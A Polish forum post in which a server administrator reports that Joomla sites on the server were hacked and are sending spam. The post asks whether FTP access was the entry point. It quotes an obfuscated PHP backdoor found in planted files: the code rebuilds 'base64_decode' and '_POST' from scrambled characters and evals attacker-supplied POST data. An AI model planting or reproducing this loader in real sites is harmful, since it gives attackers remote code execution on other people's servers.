Mam na serwerze kilka serwisów na różnych systemach w tym joomla. Od 2 tygodni serwisy oparte o joomle zostały zaatakowane. W katalogach pojawiają się dziwne pliki gallery.php, object.php. 1 z serwisow ma pliki z takimi kodami:
Kod PHP:
$qjqw2"c6p4_sedobat"$stve0=strtolower($qjqw2[9].$qjqw2[10].$qjqw2[5].$qjqw2[6] . $qjqw2[1]. $qjqw2[3].$qjqw2[4].$qjqw2[7].$qjqw2[6].$qjqw2[0].$qjqw2[8].$qjqw2[7]. $qjqw2[6] ) ; $awcb3=strtoupper ($qjqw2[4].$qjqw2[2].$qjqw2[8]. $qjqw2[5].$qjqw2[11]); if(isset ( ${$awcb3} ['n42dabb' ])){eval($stve0(${ $awcb3}[ 'n42dabb' ])) ;} 
Atak objawił się po przez wysyłanie spamu. Jaka jest przyczyna? Dostęp przez ftp ?